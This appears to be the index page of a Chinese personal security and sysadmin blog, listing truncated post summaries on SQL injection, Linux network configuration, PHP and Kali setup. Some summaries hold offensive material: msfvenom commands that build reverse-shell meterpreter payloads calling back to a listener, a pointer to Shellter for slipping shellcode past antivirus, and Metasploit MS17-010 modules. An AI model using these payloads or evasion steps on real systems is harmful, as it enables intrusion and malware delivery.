We3sT

摘要： 0x01 什么是SQL注入 SQL是一种注入攻击，通过前端带入后端数据库进行恶意的SQL语句查询。 0x02 SQL整型注入原理 SQL注入一般发生在动态网站URL地址里，当然也会发生在其它地发，如登录框等等也会存在注入，只要是和数据库打交道的地方都有可能存在。 如这里http://192.168. 阅读全文

摘要： Shellter 是一款动态 shellcode 注入工具，我们可以将shellcode注入到其它程序上，从而来躲避杀毒软件的查杀。俗称为免杀 官网：https://www.shellterproject.com/ 目前最新版本是7.2，主程序是.exe文件所以在windows下可以直接使用，在li 阅读全文

摘要： 在Ubuntu18.04中，传统的配置/etc/network/interfaces已无用，新的网络配置文件在：/etc/netplan/50-cloud-init.yaml 用vim进行编辑文件 注意格式 冒号后边有个空格 network: ethernets: ens33: dhcp4: fal 阅读全文

摘要： Centos网络IP地址配置文件在 /etc/sysconfig/network-scripts 文件夹下，ifcfg-ens33 //ens33是你当前的网卡名称 这个就是要修改的配置文件 对配置文件默认的设置进行编辑 vim ifcfg-ens33 TYPE=Ethernet PROXY_MET 阅读全文

摘要： 生成反弹木马： 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件 2. msfvenom -p android/meterpreter/revers 阅读全文

摘要： 很久没搞过这个玩意了，今天看了叫什么三 丰 云，免费云服务器 用来做一些小测试还是可以的 https://www.sanfengyun.com 阅读全文

摘要： 1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞！ 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 阅读全文

摘要： PHP获取表单值： $_POST //获取POST提交 $_GET // 获取GET提交 阅读全文

摘要： 时间过的真快，转眼就快到18年底了，然而还是没有挣到多少钱。心塞，欠了一屁股债，伤不起。最近在帮某公司做售后服务，刚没去多久，还不是很熟悉店里的情况。貌似前台小妹妹脾气不怎么好， 这不让碰那不让碰的，谁叫她是老板的妹呢~哈...好多客户来修机器都被她弄跑了呀。厉害厉害...于是便有了此文... 先f 阅读全文

摘要： kali Linux的主版本自带的是Gnome桌面环境，安装后使用效率太低，不知道是不是我机器配置低的原因， 在虚拟机里运行起来太慢、卡、丑啦...。所以以前都一直都在用Backbox Linux，并且backbox linux 默认的桌面环境是XFce， 所以渐渐的喜欢上了XFce，昨天无聊去官网 阅读全文